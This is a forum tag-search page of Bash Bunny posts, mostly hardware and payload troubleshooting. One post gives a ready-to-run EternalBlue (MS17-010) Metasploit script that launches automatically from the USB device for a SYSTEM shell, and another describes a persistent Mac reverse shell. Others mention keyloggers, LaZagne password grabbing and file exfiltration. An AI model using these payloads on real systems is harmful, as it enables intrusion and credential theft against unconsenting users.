
Showing results for tags 'bashbunny'.


Found 84 results

  1. My latest BashBunny-Challenge.....MSF - MS17_010 - BashBunny

     Thanks to Astr0baby, I am just a sharer of his excellent thoughts

     Let's go.....

     Make sure to set some date for TLS/SSL to work ;)

         # date -s "20170925"

     Add this to /etc/apt/sources.list

         deb http://http.us.debian.org/debian/ jessie-updates main

         # apt-get update
         # apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev
         # curl -sSL https://get.rvm.io | bash -s stable
         # source /etc/profile.d/rvm.sh
         # rvm requirements
         # rvm list known
         # rvm install 2.4.1
         # vi /root/.bashrc

     Add at the end

         source /etc/profile.d/rvm.sh
         rvm use 2.4.1 --default

         # mkdir /root/METASPLOIT
         # cd /root/METASPLOIT/
         # wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh
         # chmod +x msf_vps_installer.sh
         # ./msf_vps_installer.sh
         # git config --global user.name "USER"
         # git config --global user.email "user@example.com"
         # ./msfupdate

     Check the /etc/dhcp/dhcpd.conf range - and set to only one value range -

     Save this to ~/metasploit-framework as cmd.rc

         -----
         use exploit/windows/smb/ms17_010_eternalblue
         set PAYLOAD windows/x64/exec
         set RHOST
         set CMD cmd.exe
         exploit
         -----

     The above is ideal when we want to get a NT SYSTEM/AUTHORITY shell on the target Windows 7 SP1 x64 (unlocked)

     If the target is locked we can use another payload such as this one

     So RHOST would be again and LHOST …

     This can be easily scripted via Metasploit RC script so ;)

     The Metasploit RC scripts should be placed in the /root/metasploit-framework on the Bashbunny so we can call it from the PAYLOAD.TXT for the corresponding Attach Switch position.

     So ideally this would look like this (switch1 or switch 2)

     payload.txt

         #!/bin/bash
         LED SETUP
         ATTACKMODE RNDIS_ETHERNET
         # Set some current time ..... check your watch
         date -s "20170523 23:23"
         LED ATTACK
         /root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc &
         LED FINISH

     The target Windows 7 should have an accessible SMB port 445 from the USB network that the Bashbunny device creates. Default Windows system has a firewall on so the attack won't work as the port is blocked. For the demonstration purpose we assume there is no firewall on ..

     After a while you should get a NT AUTHORITY\SYSTEM cmd shell pop up on your Win 7 desktop :)
  2. Hallo!! This is my payload, just a python smb server that points to the switch folder.

     PROBLEM: it creates the share, but I can't access the files, because the /root/udisk is not mounted. If I boot the bunny in RNDIS, go to the console and do "udisk mount" I can access the files, but I can't mount udisk from inside a payload.

     Any ideas? Is there anything I'm missing? Thx, and keep on developing!! :)

         #!/bin/bash
         LED SETUP
         GET SWITCH_POSITION
         SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
         LOOTDIR=$SWITCHDIR/loot
         LED STAGE1
         ATTACKMODE RNDIS_ETHERNET
         udisk mount
         python /tools/impacket/examples/smbserver.py e $SWITCHDIR &
         LED FINISH
  3. Reverse Shell Mac for Bash Bunny

     Author: 0dyss3us (KeenanV)
     Version: 1.0

     Description

     Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP.

       • Targets MacOS (OSX may work but has not been tested)
       • Connection can be closed and reconnected at any time
       • Deploys in roughly 30 sec (working on making it faster)
       • Works well with NetCat as the listener

     Requirements

     Have a working Bash Bunny :) and a victim with MacOS

     STATUS

       LED                   STATUS
       Purple                Setup
       Amber (Single Blink)  Installing connect.sh script
       Amber (Double Blink)  Creating cron job
       White (Fast Blink)    Cleaning up
       Green                 Finished

     Installation and Execution

       • Plug in Bash Bunny in arming mode
       • Move files from MacPersistentReverseShell to either switch folder
       • Edit the connect.sh file and replace the placeholder IP with attacker's IP and the port with whichever port you like to use (I use 1337)
       • Save the connect.sh file
       • Unplug Bash Bunny and switch it to the position the payload is loaded on
       • Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec)
       • Unplug the Bash Bunny and go to attacker's machine
       • Listen on the port you chose in the connect.sh file on whichever program you'd like (I use NetCat)
       • If using NetCat, run the command nc -nlvp 1337 (replace the port with the port in connect.sh)
       • Wait for connection (Should take no longer than 1 minute as the cron job runs every minute)
       • Once a bash shell prompt appears...YOU'RE DONE!! and you can disconnect and reconnect at any time as long as the user is logged in

     Download

     Click here to download.
  4. So I wanted to know if this was safe. I made a bunny script that, when plugged into a Windows PC, would upload specific files to a folder in my gdrive. I made this a project for myself because I was bored. I manipulated the "SmartFileExtract_Exfiltrator" code and used a gdrive software to make it work. How bad can this be and should it even exist at all?
  5. Hi, I got internet connection working, ssh'd in. Did apt-get update, then apt-get upgrade. Now I'm unable to get any result of GET TARGET_IP. I did the firmware reset, but am still having issues.

         LED R SOLID
         ATTACKMODE ECM_ETHERNET
         LOOTDIR='/root/udisk/loot/IP'
         mkdir -p $LOOTDIR
         GET TARGET_IP
         echo "IP: $TARGET_IP" >> $LOOTDIR/IP.log
         LED G SOLID

     Running the above now gives me a file without the Target IP within. Any ideas?
  6. This is a little later than I had liked but I'm finally ready for an 'Alpha' Release. From the team that brought you https://ducktoolkit.com I am happy to announce https://bunnytoolkit.com

     Concept is fairly simple. All the payloads that are in the github can be opened in the browser. You can then edit the files in the browser, make changes as you like, and once you're happy with the changes click the download button to get your payload folder. Copy the contents of this into a switch position and away you go.

     For those who need a quick way of creating your own payloads we have the custom payload wizard. Answer some questions or pick a template and when you click finish you get a page that contains all the base templates which you can then add your own code to and save it as you do with the payload editor above.

     I will continue to add more custom features to the wizard and welcome any feedback or thoughts you may have.
  7. I am trying to edit the password grabber payload.txt so that the Finish LED will only turn on once laZagne.exe has finished and closed, because right now it turns on after 10 seconds while laZagne is still running, and if I remove the usb at that point, all of the excavated passwords are lost. I'd like it to work similar to powershell where if I Start-Process -filepath -wait it will wait to move on to the next line until the process has finished. Issue is, WAIT on the bunny script means Wait for switch position change, and for some reason I can't seem to get grep to find the word password in the password.txt file. Any assistance/suggestions are appreciated, I just want the finish led to actually mean finished.
  8. See some people getting stuck with updating bunnies and tools etc. so put together quicklist of what I did from a brand new bash bunny on my linux box. I'm sure there are some differences with OSX and windows but in general with adaptation or tweaks this should work for all as a general outline.

     1. Read the wiki - seriously even if you don't remember it all, know where it is and use it for reference.
     2. Switch position to 3 (closest to USB) and insert to pc. With mine I got a blue light. I also backed up the original payloads dir but it's not required.
     3. Clone the payloads github locally or download the zip and extract the contents.
     4. Copy the payload folder you just cloned or extracted to the bash bunny storage and overwrite all. You now have latest payloads. At this point if you were to unplug the bunny, select switch 1 or 2 and then reinsert you would see a purple light rather than the blue one that came from factory (at least mine did).
     5. Some payloads require dependencies such as quick creds. You install the dependencies using the tools_installer payload, so it's worth running this payload as your first payload. On the Bashbunny storage delete the payload in switch 1 or 2 and then CUT the contents of /payloads/library/tools_installer/ to the switch folder of choice. DON'T copy it as there is a slight bug if you have 2x copies of this payload on the bashbunny storage when it's run. Unplug the bunny and select the switch to match where you placed the payload and reinsert the bunny. If all goes well you should eventually see a white LED. If you see red LED you may need to check the forums.

     From this point you're ready to try other payloads or start developing new ones. Talking of which I almost forgot DuckToolkit adds support for new languages, and uses the Ducktoolkit python library for encoding.

     I had some issues getting the bunny online with ICS on linux but was mostly down to me not reading things in the bb.sh ICS script but I will point them out in case others do the same.

     1. A factory fresh bashbunny can only ICS when switch is in position 1 or 2 not in arming mode position 3. There is no Ethernet device on a factory fresh bunny in arming mode.
     2. When you download and run the bb.sh it should be first run without the bashbunny inserted and when the script gets to stage 3 you insert the bashbunny to complete the guided config.
     3. Just because you configured the bb.sh does not mean you're online, you still need to hit C to connect with the current configuration and start ICS.

     So from here you should have Bashbunny with up to date payloads, dependencies installed and are able to ICS to get it online if required. Hope this helps some people.
  9. Can I run a payload (meterpreter) (metasploit) on Android with Rubber Ducky or Bash Bunny over (WAN)?
  10. The Bash Bunny is brilliant. It can already emulate USB devices such as keyboards, USB to Ethernet adapters, serial devices and mass storage devices. I don’t know how Hak5 have implemented the emulation features, but I imagine the Bash Bunny could potentially emulate other USB devices...? My question is what other USB devices would be really interesting to see implemented? How about USB fingerprint readers, for example? Could this allow a current PC to divulge information about a user’s fingerprint, or perhaps allow another fingerprint to be loaded onto the system? I’m really interested in how this could be implemented, and what devices could be emulated. Please let me know what you think! -MB60893.
  11. Hello Guys! First a big welcome to all! I got some HAK5 gear and I'm very fascinated by it. I've also read here since I got the first gear to find help. And usually I've got a solution for me - but now I don't know how to go on...

      My BB won't write special chars. Neither with german language file nor with standard US language... All upper- and lowercase letters and numbers are working without problems. But special chars... Nothing...

      First I thought it's the german .json file because there were no Umlauts and some special chars seemed to have the wrong scancode. So I wrote my own .json file - Nothing.... Next day the new german .json with Umlauts was available - Nothing

      I have tried all commands I found anywhere to change language: - Nothing

          LANGUAGE='de'
          LANGUAGE=de
          LANGUAGE= de
          DUCKY_LANG='de'
          DUCKY_LANG=de
          DUCKY_LANG= de
          +DUCKY_LANG=de
          +DUCKY_LANG= de
          +DUCKY_LANG='de'
          QUACK SET_LANGUAGE de
          QUACK SET_LANGUAGE 'de'
          SET_LANGUAGE de
          SET_LANGUAGE 'de'

      So I've decided to try out with US Language. Changed keyboard language - Nothing.... I get no special chars...

      Anyone an idea I can try yet? Thanks and lovely Greets :-)
  12. I decided to find my Bashbunny today and to update it to firmware 1.5 and find some nice scripts I could test on it. I tried the Password Grabber. After I ran the PasswordGrabber on the Bashbunny and checked the loot folder, I noticed there was a lot of strange content in it. A lot of folders and other files that I could not open. Check attached screen. After wondering about it, I was gonna check the size of it, and it says 56TB? I am not able to delete the loot folder from either windows or linux by rm -rv. I just get an error message that it's read-only and I don't have permissions to do that! Strange.

      I have tried this:

        • Remove the loot folder
        • Move the loot folder to another folder, then delete (that's what I've been doing on the screenshots attached to this post)
        • Do a factory reset on the bashbunny up to several times. (Unplug three times on green blink)
        • Even upgraded by the bashbunny upgrade tool and manually by downloading the .tar file and copying it into the root of the bashbunny

      Do any of you have any ideas how I can recover my bashbunny and hopefully bring it back to life?
  13. I have been trying to figure out a problem with this payload and for some reason I just can't get it to work. I have impacket in my tools file and installed. When I plug my Bunny in it goes through the colors but it gets stuck in the blue color and I can't figure out why. Does anyone have the same problem?
  14. So, it has been a bit since I did any work on the BBTPS so posting some work I began doing on it.

      First, I have gotten some messages about the BBTPS needing to use npm to get Express before adding to Bunny. If you pull the No_Express branch, you will only need to copy it to the Bunny. No Node dependencies needed. That one had the web server rewritten to use core modules instead of addons.

      First, current bug: If your script is huge and you specify it to be a process, it may not run. This is due to the cmdline 8191 character limit. The process launcher in the BBTPS launches a new powershell process with your script as a compressed/encoded command. If it is too big, it gets truncated. I am working on a different method so any size script could be fired as a process. Running it in a thread works fine since it runs as a job script within the agent. Workaround would be to store the script in the /loot/bbtps folder and have a script in your joblist as a process that pulls the main script through the SMB server that is running and executes it. What led to this discovery was another user pointing out issues with Powercat I included, which is a huge script and broke because of the limit.

      Stuff I am working on:

      Welp, for one I am refactoring the node server. This is to make it easier to make future changes that require changes to the server, which leads into the next change.

      The quack scripts control is being moved over to the node server. The launcher for the agent will not launch directly from the payload.txt but by the node server when it comes online. This will reduce the stager size since I will not need the looping wait counter to wait for the server to come up anymore.

      A new field is being added to the joblist.json schema called admin that will be boolean. This field specifies if the script requires admin rights. This leads to the new feature I am working on, Autoadmin. No need to guess if the user is admin or not. The BBTPS will fire off a non-privilege command prompt. It will then fire a non-hidden stager that will pull down stage1 which will check for certain requirements. After checking, a signal is sent back to the node server running on the Bashbunny. The signal depends on if the user is a local admin or not. If they are then the signal will cause the Bashbunny node server to quack out the commands in the still open cmd prompt to launch a hidden stager elevated and even quack out the keystrokes to select yes. If the user is not admin then a normal hidden stager is launched with no extra keystrokes needed. On the server the joblist it has will filter out admin jobs if the user is not admin or keep them and run them with the non-admin jobs if user is admin. Non-admin jobs always run.

      Reduction of config files...well by 1. I am removing the payselect.txt file for config selection. It can be done from within the payload.txt file. The joblist.json file that lists the scripts is still there (how else are you going to be able to have different lists of scripts to run ready to go?) and the config file for the joblist is still needed to be configured (this is how you select the folder that has your scripts and the joblist file to use along with the quack delays and other fine tunings or do all your joblists work the same way?). The other files are still needed to preconfigure all your different job packs so if you want to switch, you just need to change the config file name in the payload.txt.

      HoppEye8x by H8.to. This will come in a later version as I am still working out a good way to implement this though would extend the possibility of being able to on the fly select out of 8 preloaded jobpacks you preconfigure to launch. This would extend the number of scripts you can run by 8x the number of scripts you have configured in each jobpack per.

      More work on instructions. I figured out I had issues with my instructions because I was trying to instruct on proper powershell module writing at the same time (which is not required for the BBTPS to work with but makes them way easier to be ported around into different jobpacks). New instructions will only include how to install, where all the configuration is done and their meaning and use the current sample I have as an example of how it works so the samples will include the new methods.

      Just to reiterate, the BBTPS is a tool, not a payload. Payloads included with the BBTPS and jobpacks created from them in the repo are from other projects and there as example of usage not as included functions of the tool.
  15. Hello everyone, I've made a notepad++ syntax file for bashbunny script. If you want you can download it from my GitHub. https://github.com/CIPH3R0/Bashbunny-syntax C1PH3R "Don't look at the branch of the problem, look at the root (C1PH3R)"
  16. Hello: I have a BashBunny plugged into a Windows laptop and I want to connect to it via the serial port. Before posting this question I searched the forums on serial port and didn't get any related results back. In Device Manager, it shows up as COM3. This is my PuTTY config: Serial -- COM3 115200, 8, N, 1. When I launch the console, it just hangs there. When I bang on the Enter key, it just hangs there. Nothing happens... I never get a prompt. Any thoughts? Thanks!
  17. Link to GitHub: https://github.com/CIPH3R0/bashbunny-payloads/tree/master/payloads/library/KeyHopper The way to have a keylogger installed in seconds! Tell me what you think! C1PH3R "Don't look at the branch of the problem, look at the root (C1PH3R)"
  18. Having just bought the Bashbunny today I was so excited to get it working and do all sorts of things with it after having to wait for a week for it to ship to where I live :3. When I got it I updated the firmware using the osx bashbunny updater tool which worked great and that had me think that it was all going to be smooth sailing from there, but I got this feeling that things that have to do with IT never ever work that simply (at least with me) and luck would have it that I didn't have my windows box with me as I am traveling and I carry my mac with me as it is my daily driver.

      The suffering began when I wanted to share the internet connection with the bunny via the method which involves running a squid proxy. I followed the guide to the letter, but for some reason or another I couldn't run squid with the -Z command nor did I get it to work for me. After long hours of fiddling with it I decided to give up on that method and tried to look in the forum as well as youtube for another solution. I found people suggesting running a payload which will test the connection, and fiddling with the internet sharing in mac (which gave me a massive headache because at times it would let me ssh to the bunny and disconnect the internet from my pc or it would let me use the internet and not be able to ssh into the bunny). In the end I almost cried while staring at my terminal window with lifeless eyes. It dawned on me that I have a very small linux box that I carry around with me (because in my head it makes sense and I convince myself that I'll find some use for it sometime).

      The raspberry pi which I lug around, which I haven't used for a while, proved to be my savior, and so I boot it up, I run the guided setup script and it works. But imagine this: I'm sitting in my mom's house on a sofa with a macbook connected to a raspberry pi connected to a bashbunny for the sole reason of wanting to update the linux distro on the bash bunny.

      Ps: the Guided Setup had me walk the walk of shame a couple of times during the setup process where it made you disconnect the bunny and connect it again.

      This might not be relevant to the topics that people usually post here (sorry if that's the case) but I had a lot of fun with this and I wanted to share it with someone xD.
  19. Hey there guys, I'm new to the BB and Hak5 forums, but decently familiar with computers in general. My issue is when using any payload asking for a tool, it just doesn't seem to work. Depending on the payload I get a failed LED. Mostly talking about PasswordGrabber but I've tried many. I feel that somehow I'm not installing the tools correctly or putting them in the wrong directory. Some of the advice out there seems to be for old firmware and have changed.

      Here is what I have done so far:

        • Plugged the BB in my PC and played around with a few ducky scripts. It worked great.
        • Copied the payload directory from github and tried several credentials payloads to no avail.
        • Used bashbunny updater and updated to 1.5_298. No dice.
        • I moved to a second PC, disabled antivirus and malware services. No difference.
        • I tried some payloads again and they added folders to loot directory but they were empty.
        • I figured out I needed a few tools so I added the .deb to tools folder in arming mode. Safely ejected and reinserted. I assume they installed.
        • Specifically per the instructions I added the LaZagne.exe to the switch location and tools folder. Tried again and it didn't work.
        • I puttied into the BB via serial and poked around. The only directories there were: loot, udisk, version.txt. All of which were empty except loot which had a few folders of password grabber and quickcreds. Those folders were empty.

      So I want to restate that powershell commands, ducky script and bash commands work fine to my knowledge. It seems to fail when using external tools, although I could be wrong. Also, maybe just something I have to learn how to fix but RNDIS does not ever get an IP address. Does the BB spit out logs anywhere? Any help would be greatly appreciated.

      0rang3
  20. Anyone got any ideas of replacing the casing on the switch of the Bash Bunny? https://imgur.com/a/YHIco
  21. Hi there, I just made a small addition to Darren Kitchen's wait.sh for social engineering. If you have to social engineer your way to your target computer, you can just call "SEWAIT" at a suitable part of your payload. BB will be connected as STORAGE and you can download whatever file to your victim user and show it to him. BB will wait until you change the switch position and then start your original payload. Please be aware that if your payload utilizes "GET SWITCH_POSITION" you should call this before "SEWAIT"... Here is the link to the pull request: https://github.com/hak5/bashbunny-payloads/pull/327
  22. Hello! I would like to ask if there is any way to use meterpreter directly from the bash bunny metasploit over wan after I infected a machine. And also if S. E. T is working :) Thanks in advance :)
  23. I've been trying all day to fix my bash bunny, but nothing seems to work. I've been trying all kinds of payloads on the GitHub repo and even making one myself. The issue I'm having is that the bash bunny won't do anything when I plug it in, but it's still recognized though. Keep in mind that I got my bash bunny yesterday so I'm not good at managing it. So if you think I'm making a beginner mistake just go ahead and tell me. Hope you can help me, thanks!
  24. Hey, I have made a group to build programs, tools, payloads, etc. If you have an idea or want to commute just take a look at the GitHub: https://github.com/CIPH3R0/C1PH3R C1PH3R
  25. Hey, I'm having a problem with the BB and just want to know if I'm the problem or if there are more people with the same issue. I got the BB a few days ago, and I'm trying to use the PasswordGrabber. I managed to get it working, but every time I reboot in Arming Mode (or disconnect and reconnect), the "tools" folder gets empty, and with that, I'm losing the lazaGne.exe, so every time I want it to work I need to copy the .exe back to the "tools" folder. Thanks, and hope I can find some help.